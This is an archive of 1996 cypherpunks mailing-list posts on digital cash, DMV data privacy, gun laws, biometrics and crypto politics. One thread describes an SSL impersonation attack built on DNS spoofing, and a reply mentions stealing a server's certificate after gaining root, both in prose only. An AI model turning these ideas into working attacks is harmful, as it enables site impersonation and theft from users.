Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peng-chiew low <pclow@pc.jaring.my>
Date: Fri, 9 Aug 1996 03:08:35 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: F2 hash?
In-Reply-To: <2.2.32.19960808142120.006c075c@gonzo.wolfenet.com>
Message-ID: <320A1A48.5A93@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn wrote:

> Have you seen Mudge's white paper on S/Key?  

Any ideas how I can get my hands on this paper?

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 9 Aug 1996 16:39:52 +0800
To: TrustBuckFella <TrustBuckFella@nowhere.com>
Subject: Re: TrustBucks
In-Reply-To: <65tr6crmj9@nowhere.com>
Message-ID: <v0300780cae306e48020c@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:11 -0500 8/7/96, TrustBuckFella wrote:


>
>"Robert A. Rosenberg" <hal9001@panix.com> writes:
>>I fail to see why/how the initial swap of  TrustBucks(Alice) for
>>TrustBucks(Bob) followed by Alice returning the TrustBucks(Bob) [as
>>supposed payment] differs from her just paying with the TrustBucks(Alice)
>>in the first place [ie: He is willing to accept the TrustBucks(Alice) as
>>payment for the TrustBucks(Bob) that she will use to pay off her debt]. The
>>net result is the same - Bob has the same amount of TrustBucks(Bob) in
>> circulation and has an amount of TrustBucks(Alice) equal to Alice's payment
>> [the back and forth of the TrustBucks(Bob) is just playing "Right
>> Pocket/Left Pocket"].
>
>I admit, my analysis is probably flawed and I appreciate you challenging
>me on it. But I think it's more complex than the net result of single
>transactions.
>
>The way I figure it, if Bob could accept / not accept any variety of
>TrustBucks, then he can manipulate what varieties he reports being able
>to give in order to escape debts or manipulate what varieties he reports
>being able to accept in order to keep debts unpaid (for interest,
>foreclosure, etc.)
>
>    For instance, Alice is paying off her credit card, which pays Bob a
>    big 17% interest. Bob would rather not let her off early. "Nope, we
>    aren't accepting TrustBucks( Carol ) this week. TrustBucks( Dave )?
>    Let me see.... hmm... nope, sorry ma'am."
>
>    For instance, Alice has just eaten at Le Cafe Bob, and is about to
>    leave. Presented with the cybercheck, she "discovers" that she
>    hasn't got anything Bob is willing to accept. "Sorry 'bout that,
>    Bob. Ooh, hafta run! Bye bye."
>
>
>So it seems to me that the simplest course is to allow payment in
>exactly one variety, the payee's own. Bob can't credibly claim to not
>trust himself.
>
>You might object that the same problem is incurred anyways in
>TrustBucks. If Bob refuses to trade TrustBucks( Bob ) for TrustBucks(
>Carol ), isn't it the same thing as refusing TrustBucks( Carol )?
>
>I think it's subtly different, though. If Bob can accept other people's
>currency, he need not issue any himself. He can credibly refuse early
>payment, since no TrustBucks( Bob ) even exist. If Bob can only accept
>TrustBucks( Bob ), then Alice, who reports having no TrustBucks( Bob ),
>can't "innocently" incur debts she finds she cannot pay.

I admit that Bob can play games by altering the list of which currencies
(other than his own and Alice's) he is willing to accept from Alice. All I
was attempting to point out was that in the simple example you stated
(Alice does not have enough TrustBucks( Bob ) to pay off a debt to Bob so
she "Buys" the amount she needs by using TrustBucks( Alice ) and then
immediately returns the TrustBucks( Bob ) as her payment), the initial
transfer of TrustBucks( Bob ) is all smoke & mirrors (and a bookkeeping
trick) since he is still accepting payment in TrustBucks( Alice) not
TrustBucks( Bob ). The net result is that he is canceling some debt by
accepting the TrustBucks( Alice ) which he might later use to pay Alice for
something.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Fri, 9 Aug 1996 19:38:16 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <Pine.LNX.3.94.960809064227.730D-100000@switch.sp.org>
Message-ID: <Pine.SUN.3.92.960809000709.28414A-100000@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
> > I do think that the information should be able to be disseminated on the
> > Net as long as it's legal.
> >

"The Deviant" wrote:
> Yes, but I can also see why its a bad idea to put somebody's VIN on the
> Net... A clever terrorist would simply plant peices of metal with some
> other loser's VIN's in their car before blowing up a building, (i.e. my
> name's McVeigh (sp?), and this rider truck came from Oregon ;)... see my
> point?

A clever terrorist could get the CD and do the same thing :)  They're
clever, right?

> I do think that some information could be allowed (what your tag says,
> your name, your mailing address), but what was put on he net was excesive.

That's a function of what information the State decides to make availble.
The fact that it's on the Net or not shoudln't be the issue.  If I can buy
it on a CD or march into a State office and get it, the same potential
harms exist.

I persoannly think this info is a privacy threat.  But if it's legal to
distribute in other forums, the Net should be no different, IMHO.  All Net
terrorist hype aside.


Rich
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Fri, 9 Aug 1996 18:07:19 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <2.2.32.19960808154452.00c70514@vertexgroup.com>
Message-ID: <4uep7t$tkp@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.GUL.3.95.960808151724.6575A-100000@Networking.Stanford.EDU>,
Rich Graves  <rich@c2.org> wrote:
> I agree that this project needed to be done to educate the public, but I
> must say I'm glad my name isn't attached to it. 
> 
> To answer legitimate concerns about abuse, perhaps version 2 could make the
> relevant http logs publicly available?

I'd be most proud to have my name associated with such a project.

I say, what we need is a little more abuse.  I say, a well-publicized
incident of abuse of the driver's license database can do more to
help the cause of privacy than any amount of intellectually compelling
debate.  Perhaps one horrible incident of abuse would ignite enough
public backlash to stop states from selling their databases at the
drop of a hat.

I say this in all seriousness.  Look at how much furor has been
raised from one little incident (the TWA flight, the Atlanta bombing)
which caused an absolutely insignificant loss of life (in the grand
picture).  Look at how much folks want to curb our freedom in response.

We have been shown all too many times how much a highly-publicized
case of abuse can be used to trample on our civil liberties.  It's
about time for us to wise up.  It's time to fight fire with fire.

No regrets,
-- Dave Wagner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 18:50:23 +0800
To: cypherpunks@toad.com
Subject: Re: Imprisoned for Not Having a Gun?
Message-ID: <ae30450b0d021004223a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:57 AM 8/9/96, The Deviant wrote:

>I agree with you.  I don't have anything against guns, but either
>requiring them or disallowing them is just plain dumb.  It should be
>noted that the Supreme Court's interpretaion of "Congress shall make no
>law" is basicly "no lawmaking body that holds any jurisdiction shall make
>no law"...

On this last point, I used to think so, too. However, one of the law
professors on one of these lists gave various examples purporting to show
that this is not so, that local jurisdictions can and do pass laws which
Congress is not permitted to pass.

If they read this, they can comment.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 9 Aug 1996 13:51:15 +0800
To: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Subject: Re: ****CyberWatch Security With Face Recognition 08/07/96
In-Reply-To: <9608081407.AA01011@rpcp.mit.edu>
Message-ID: <199608081731.DAA05628@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> Some of the information that can be protected includes medical,  
> financial, criminal, or military records, officials said. The system 
> requires no training, is fast to use, and cannot be fooled by holding 
> up a photo of a person. 
> 
> This technology has been used in other situations, including the  
> securing of buildings or special areas, officials said. 
> 
> TrueFace CyberWatch is compatible with PC client/server standards and  
> can be used alone or with other security programs, officials said. 
> 
> The client runs on Windows 95 and Windows NT operating systems, and  
> costs $199. A bundle package, which includes a Connectix camera and 
> the software, is priced at $298. Both products will be shipping 
> within the next two months, officials said. 

Useless system for any high security application. May be good for
low-security applications if you are dealing with people who are too
stupid to use tokens.

The reality is that people do not treat their faces like secret keys
(depending on sex, religous beliefs and how many warts they may have). A
regular photo may not fool the device, however one specifically developed
for the purpose may, or if the device has some sort of depth perception,
a hologram or modeled head - all of which can be obtained from publically
availabe data - your face.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 9 Aug 1996 15:24:33 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Boom!
In-Reply-To: <ae2fd9c406021004edd7@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960809033437.18281B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 8 Aug 1996, Timothy C. May wrote:

> On a related note, it looks like Richard Jewell, the "Olympic Bomber," may
> not be charged and may even receive a page 37B "letter of clarification"
> from the Feds. No word on what the pack of 100 media vultures camped in his
> apartment's driveway will say.
> 
> I suspect he will never live a normal life. Even if never charged, the
> splashing of private photos from his apartment--such as him cradling an
> AR-15 while dressed in camo--will stick in people's minds. What recourse
> does he have that camera crews were invited in on the searches? (*)

None. He'll be forced to spend his life touring the talk show circuit, 
promoting the made-for-TV movie. If they'll make four different "Amy 
Fisher" movies at four different networks, they'll make at least one on this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 9 Aug 1996 15:00:28 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Internal Passports
In-Reply-To: <Pine.LNX.3.93.960808101728.254H-100000@smoke.suba.com>
Message-ID: <Pine.LNX.3.94.960809041326.653A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Aug 1996, snow wrote:

> Date: Thu, 8 Aug 1996 10:18:07 -0500 (CDT)
> From: snow <snow@smoke.suba.com>
> To: The Deviant <deviant@pooh-corner.com>
> Cc: "Mark C. Henderson" <mch@squirrel.com>,
>     Bill Stewart <stewarts@ix.netcom.com>,
>     "Timothy C. May" <tcmay@got.net>, cypherpunks@toad.com
> Subject: Re: Internal Passports
> 
> On Thu, 8 Aug 1996, The Deviant wrote:
> > On Wed, 7 Aug 1996, Mark C. Henderson wrote:
> > > I note that California requires some sort of documentation (birth 
> > > cert, INS documentation etc.) for a new driver's licence. Don't know
> > > about other states.  
> > 
> > Hrmm... North Carolina requires 2 forms of ID, which can be an older
> > Driver's license, a SS card, a military ID, a birth certificate, or
> > (you'll love this one)...   "A filled in job application"... It doesn't
> > even have to be signed by the company, or any of that shit.  I can walk
> > over to RatShack, ask for an application, fill it out as "J. E. Hoover",
> > and its a valid form of ID at the DMV.
> 
>      You forgot "The Family Bible" at least that was in effect the last
> time I was in N.C.
> 

Ah.. yes.. I knew I was forgetting (repressing?) that I live in "The Bible
Belt"... What having a minister as a parent, its an easy thing to try and
repress...

 --Deviant
No one can guarantee the actions of another.
                -- Spock, "Day of the Dove", stardate unknown


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgq7PDAJap8fyDMVAQH9Wgf/UA41BvrNvNY2kEihtGm7XCgAtblb+6vv
i0CGAB83r0idDy+JVfAOOh//MflQLRImVO1LzGXCmpWZpcuWjQuW99T/cgDqkmi0
sER+kpZ779Yw3+Jn1vIxQevgeKMOBeJ5MmG27kbqSnBaD+kd3e/nFhbfjVM4KWdG
X0KByRNbKZJGGxkg5FYguaRr0DHlbqFXQCJY0LWPhL5+1gi41jSCNvXr0PL4h5FG
dwv2QO9wQ3UYGKLlb48EhC5WKkQa2qYx3qP8sHJewXxcVtAjyAzvmW87Y9fGwuwA
EjleCqGJBxMa4UckiRSRxxjZBN2gWP1szVzWSLMkioBVZgtd4xi9fw==
=7QMw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 9 Aug 1996 15:19:46 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: An SSL implementation weakness?
In-Reply-To: <83952437618205@cs26.cs.auckland.ac.nz>
Message-ID: <Pine.LNX.3.94.960809045202.653D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 9 Aug 1996 pgut001@cs.auckland.ac.nz wrote:

> Date: Fri, 9 Aug 1996 05:12:56 (NZST)
> From: pgut001@cs.auckland.ac.nz
> To: cypherpunks@toad.com
> Subject: An SSL implementation weakness?
> 
> The following weakness seems very obvious, I've got a partial writeup of this 
> but before I turn it into a paper or something and arrange a demonstration of 
> how it would work I thought I'd check to make sure (a) someone else hasn't 
> mentioned it before, and (b) it is actually possible (it seems too simple to 
> be true):
>  
> 1. Using DNS spoofing, stage a hostile takeover of an address (for example 
>    using bogus referrals set yourself up as the delegated server for a DNS 
>    subtree).
> 2. Get a Verisign certificate for an arbitrary company and set up a bogus site 
>    at the stolen address.
>  
> Lets say you steal www.megafoobarcorp.com.  People connect to this site (which 
> is actually your bogus site), Netscape (for example) displays the blue line 
> and non-broken key (which is actually for your J.Random certificate rather 
> than the real megafoobarcorp one) to show the connection is secure, and you've 
> just subverted their site.  
>  
> The problem is that unless the user on the client side checks their 
> certificates (which noone does), all they're told is "A secure link is 
> established", not who the secure link is established to.  Even if browsers did 
> pop up a dialog to tell them who the secured connection was to, after about 
> the third time people would click on the "Never show this incredibly annoying 
> dialog again" option and never look at it again.     
>  
> This effectively reduces an attack on an SSL-enabled server to an attack on 
> the DNS.  Is this as simple as it seems, and is it worth doing a writeup on?
>  
> Peter.
> 

This certainly _looks_ like a viable hack on SSL...
of course, the other option is just hack Root on the _real_ server, and
steal their certificate (harder than I make it sound, but usually not to
complicated, assuming you can spoof IP and DNS, etc...)

 --Deviant
        "Evil does seek to maintain power by suppressing the truth."
        "Or by misleading the innocent."
                -- Spock and McCoy, "And The Children Shall Lead",
                   stardate 5029.5.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgrEWzAJap8fyDMVAQFhUwf9EanUPzCVnp1rawVKucnuG78GvwpRNZzA
Pu1LXIpfiCZeIsDOsLUMEHoyhukYuxnO8sZOS4CJdifU7ibdyofhxyBrxB+xOmny
2bnqSmOKl7qFocFFIEPUj7byThp22X4ynGuqgv4iBLuL7h2gaOuF7iz1mxacU0AJ
7QDsyiUJV/0mCOZeO+KEre/TLnsWOqbL5GGnsjM6JZ12LsqFUmXwQySWOkywbisq
OFt6jxo2JlfLDm5+XXyN5VTnTEsub4q/qaTf2bu9FLUfSic73YzusMyK9mmZ7nwu
0XEeV7zooQ16tCwD9XS2eoVHmqmUzrxiypZcrSmf9MvCwzFgVGxyYQ==
=Ckhu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 9 Aug 1996 15:03:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <ae2f8d2303021004ed0d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.95.960809045122.23081F-100000@netcom7>
MIME-Version: 1.0
Content-Type: text/plain


	Tim:

On Thu, 8 Aug 1996, Timothy C. May wrote:

> >Pardon me Jonathon, but I believe you are confusing Morton Grove
> >with Elk Grove. I do not have the statistics for the crime rates

	Mea culpa.  Morton Grove is right.  

> Regarding that town nearby that passed a _requirement_ that all households
> have a gun:
	
	In the case of Kennesaw, if you had a personal objection 
	to having a handgun -- or any other weapon --- in your home,
	you were automatically exempt.  If federal, or state law 
	prohibited you from owning a weapon, you were also exempt.  

	Also note that the official city policy was to not enforce
	that specific law.  It was a purely symbolic thing, which
	did have some interesting side-effects.  

        xan

        jonathon
        grafolog@netcom.com



VapourWare is like the Tao,
Looked for it cannot be found,
Reached for it cannot be touched,
Waited for not even FedX can deliver;
            <Paid for it will not be refunded>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Fri, 9 Aug 1996 06:19:08 +0800
To: cypherpunks@toad.com
Subject: An SSL implementation weakness?
Message-ID: <83952437618205@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The following weakness seems very obvious, I've got a partial writeup of this 
but before I turn it into a paper or something and arrange a demonstration of 
how it would work I thought I'd check to make sure (a) someone else hasn't 
mentioned it before, and (b) it is actually possible (it seems too simple to 
be true):
 
1. Using DNS spoofing, stage a hostile takeover of an address (for example 
   using bogus referrals set yourself up as the delegated server for a DNS 
   subtree).
2. Get a Verisign certificate for an arbitrary company and set up a bogus site 
   at the stolen address.
 
Lets say you steal www.megafoobarcorp.com.  People connect to this site (which 
is actually your bogus site), Netscape (for example) displays the blue line 
and non-broken key (which is actually for your J.Random certificate rather 
than the real megafoobarcorp one) to show the connection is secure, and you've 
just subverted their site.  
 
The problem is that unless the user on the client side checks their 
certificates (which noone does), all they're told is "A secure link is 
established", not who the secure link is established to.  Even if browsers did 
pop up a dialog to tell them who the secured connection was to, after about 
the third time people would click on the "Never show this incredibly annoying 
dialog again" option and never look at it again.     
 
This effectively reduces an attack on an SSL-enabled server to an attack on 
the DNS.  Is this as simple as it seems, and is it worth doing a writeup on?
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 9 Aug 1996 19:52:10 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960809093040.0092e510@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 AM 8/9/96 -0700, David Wagner wrote:

>I say, what we need is a little more abuse.  I say, a well-publicized
>incident of abuse of the driver's license database can do more to
>help the cause of privacy than any amount of intellectually compelling
>debate.  Perhaps one horrible incident of abuse would ignite enough
>public backlash to stop states from selling their databases at the
>drop of a hat.

The murder of the actress Rebecca Schaefer (sp?) by an obsessed fan (who
paid a private detective to get her address from the California DMV) did
cause California to somewhat restrict license and registration information.
I think they eased up though later.  I don't know who can get info there
these days.

This particular problem can be avoided privately by reporting a mail drop
rather than your real address to the state.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 9 Aug 1996 16:33:16 +0800
To: Jamie Zawinski <jwz@netscape.com>
Subject: Re: e$: Watching the MacRubble Bounce
In-Reply-To: <3209A1D4.7566@netscape.com>
Message-ID: <Pine.LNX.3.94.960809061155.730B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Aug 1996, Jamie Zawinski wrote:

> If you accept that, then doesn't that make writing crypto software for
> any Unix platform *even more* of a waste of time?  Because last time I
> checked, there were way more Macs on mom-and-pop's desks than Unix
> machines, counting *all* vendors.

Pardon my French, but you mus be fucking stupid or somehing.  How many
universities use UNIX platforms?  How many companies use UNIX platforms?
Sun, DEC, and SGI don't stay in buisiness by building cheap Windows boxes
ya know.  There are 13948 _registered_ LINUX machines, not to mention the
unregistered ones.  Don't tell me that Cray's were designed to run MacOS
or Windows 95.  UNIX isn' NEARLY as dead as Apple is.

 --Deviant
Military secrets are the most fleeting of all.
                -- Spock, "The Enterprise Incident", stardate 5027.4


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgrZbTAJap8fyDMVAQFSagf8C3/HIX7XwtFYRAKxhs8AlDIsO1EXDgr9
jm9RzjGMXqHkgg0OC/0Bzp+OtcYYL5qg/JtaZo90LIdPbqEeOb7HkcYgXkPZ9SLd
sQKIsZMr6IShG7ZIdPH9BRJWn131ExbUjCZ5IfMJVHsimTVbfLHHSppDylxtl2bG
pI6d9FdCWj8puL3omB9PD9gpjoaF4p961+HBclH8W6PLzI+swc/6f49Uxv3LIF4w
gm5IepZmoerW2iK2hwawngZPZJ4Sr4VqzyrAIvDl+rIFLFlN3ejNaGEjwHcNc43+
IBwoOS4kdv16faxT1jBskbKhcywmGqfIrap6Rdr0KkO5DyHHsSTz5g==
=UBUr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 9 Aug 1996 16:49:02 +0800
To: Rich Burroughs <richieb@teleport.com>
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <Pine.SUN.3.92.960808094648.21717A-100000@linda.teleport.com>
Message-ID: <Pine.LNX.3.94.960809064227.730D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Aug 1996, Rich Burroughs wrote:

> Date: Thu, 8 Aug 1996 09:50:57 -0700 (PDT)
> From: Rich Burroughs <richieb@teleport.com>
> To: cypherpunks@toad.com
> Subject: Re: Oregon License Plate Site in the News Tonight!
> 
> On Thu, 8 Aug 1996, Declan McCullagh wrote:
> 
> > Looks like we're a little late. However, we can still grab the tape from
> > Oregon's DMV for $220. It would be an interesting excercise to try to get
> > these tapes from each state with similar provisions and put them all
> > online.
> 
> This information has been available in Oregon for at least a couple of
> years on CD.  I've always been concerned about the privacy implications of
> that service -- perhaps that's the upside of this story?  That people do
> give a rat's ass about their privacy?
> 
> I do think that the information should be able to be disseminated on the
> Net as long as it's legal.
> 

Yes, but I can also see why its a bad idea to put somebody's VIN on the
Net... A clever terrorist would simply plant peices of metal with some
other loser's VIN's in their car before blowing up a building, (i.e. my
name's McVeigh (sp?), and this rider truck came from Oregon ;)... see my
point?

I do think that some information could be allowed (what your tag says,
your name, your mailing address), but what was put on he net was excesive.

 --Deviant
Horse racing *is* a stable business ...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgreiTAJap8fyDMVAQHVawf/Txcu6RrhfLvx1kW3Z1VKXmzcP/AeDaeB
2VkEsicQ6xIeHHCUqrE88gJyEVdk8LXRg9wD2OQQObeQUtt6kjAyyxF4QlRz8zVC
EkgD4LAlgSfK/JErkO9rHuYutRc2FFtccd48GilQXTDBQWNLJWojLuObdqnxkT5s
zQDaLvVyy5p4bN2QN76nH+RnAoin+guyEl9EG4TBPo17uY2rIwt3NkTGIfASiKL5
46ugaobiE3Hmaw3GW3YR4nyva35ur3BwAo4uOmfyqsU3MEZx6SoGQpQlzIWDPqwa
T73LplenMei1oTCTssQzF4YODHkqVv0u1uNpVI3GXJgwNKupfMOOtA==
=Z9sz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 9 Aug 1996 17:25:29 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <ae2f8d2303021004ed0d@[205.199.118.202]>
Message-ID: <Pine.LNX.3.94.960809065417.730E-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Aug 1996, Timothy C. May wrote:
> 
> Pro-gun fascism is just as bad a anti-gun fascism.
> 
> I do recall that the "you must have a gun" town had some exemptions for
> folks opposed to guns, blah blah, but it still is intensely revolting to me
> that any town could ever pass such a law. Much as I think being armed is
> useful and all that, allowing such a law to go unchallenged feeds into the
> same approach that tries to ban guns...if guns can be required, they can be
> banned. What part of the Second Amendment did they not understand? (Legal
> quibblers will perhaps say the Second applies to _Congress_ (as in
> "Congress shall make no law"), and not to states and communities. I
> disagree. Can a town restrict free speech just because it is not the
> Congress?)
> 
> --Tim May
> 

I agree with you.  I don't have anything against guns, but either
requiring them or disallowing them is just plain dumb.  It should be
noted that the Supreme Court's interpretaion of "Congress shall make no
law" is basicly "no lawmaking body that holds any jurisdiction shall make
no law"...

 --Deviant
There are four kinds of homicide: felonious, excusable, justifiable,
and praiseworthy ...
                -- Ambrose Bierce, "The Devil's Dictionary"


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgrhejAJap8fyDMVAQEl1gf8C06PaoBEoOB971MpYa/4DejUinTxvpCS
9Q8/AgPSnbIlMhbwGcFkbjM+kuORfsWTJmlczMRxRXIApyK4qIYoG9HEx1lYWJ+b
bZ7X5FpiSKm3fIZ52eK8R2jCdcxGlq/5Fm3DrGemvPBb5swKMR8y3WWs/ETuwzOM
vTBXskonzAqRoMPysKyDUc2BY5n6+k5M22JAalIyAD8HQVyTgxcPv4E8qTWsgW60
qgNy+mv3nJ0sERCDas8WWCPWJ4FuIKg+KgL8bFELkri1CU7f5DdKCxa5bFfMM9kN
njd6mXMZ3qVbNtkMG59xOVIoOIx918jzXZcnXyoThbBCvIyTOFPnHQ==
=aSan
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 9 Aug 1996 17:08:50 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why should we trust the system?
In-Reply-To: <199608090119.SAA20142@mail.pacifier.com>
Message-ID: <Pine.SUN.3.95.960809070718.6581G-100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


	Jim:

On Thu, 8 Aug 1996, jim bell wrote:

> Okay, I'll admit that I _never_ believed that judges actually follow the 
> standards they claim to.  But many other people of those who are more 

	I know of a very good way to ensure that judges do follow
	the standards that they claim to follow.

	It works even better at making politicians keep all the
	election promises the make.

	Has one drawback --- it reduces the number of people willing
	to carry out those two functions to virtually zero.  OTOH, that
	probably would be a very good thing.  

        xan

        jonathon
        grafolog@netcom.com

		VapourWare is like the Tao,
		Looked for it cannot be found,
		Reached for it cannot be touched,
		Waited for not even FedX can deliver;
		            <Paid for it will not be refunded>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Fri, 9 Aug 1996 12:48:28 +0800
To: cypherpunks@toad.com
Subject: Re: Talking about Crypto Anarchy
Message-ID: <1.5.4.32.19960809011710.002ed7ec@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 20:12 06/08/96 -0700, Timothy C. May wrote:

>6. I've given up on discussing crypto anarchy in short talks because nearly
>nobody in the audiences I've done it for has the foggiest notions of what
>I'm talking about, and I've found no short, sweet, simple methods of
>getting across the implications.
..
>(I've also seen David Chaum struggle to just get the basic idea of
>"credentials without identity" across to a tecnical audience...even when he
>concentrates on only getting a single facet of his ideas across, the light
>bulbs just don't go off in the heads of the audience members...

I appreciate what you are saying, and I'm sure we all have felt this frustration
at some time or another. I've had lots of people, particularly
social scientists,
aghast at the thought that I could have spent 4 years on a PhD trying to get
a crane to reach its destination 2 seconds sooner -- after a while, you just
get tired, and reach for your beer.

However, policy that affects us is framed by people with little idea, and
*someone* with a clue has to educate them (as well as, maybe, educate
their constituents to bring the right kind of public pressure). Perhaps
people like Tim, who seem to be tired of this, could further the cause best
by "training the trainers." Which, I suppose, is what he is doing
on this list...

In closing, a short, simple story that's worth thinking about:

When Buddha attained enlightenment, the gods asked him to go forth and
spread his knowledge to the  world.

"Why should I?" he asked, "Those that know won't need it, those that need it
won't listen."

"Can you rule out," asked the gods, "that there might be people in between?
Those that with your teaching might learn, who otherwise wouldn't?"

Beware of binary thinking...

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 10 Aug 1996 02:05:46 +0800
To: jim bell <jimbell@pacifier.com>
Subject: PRACTICAL USES FOR DMV RECORDS
In-Reply-To: <199608090530.WAA04981@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960809074041.19416A-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
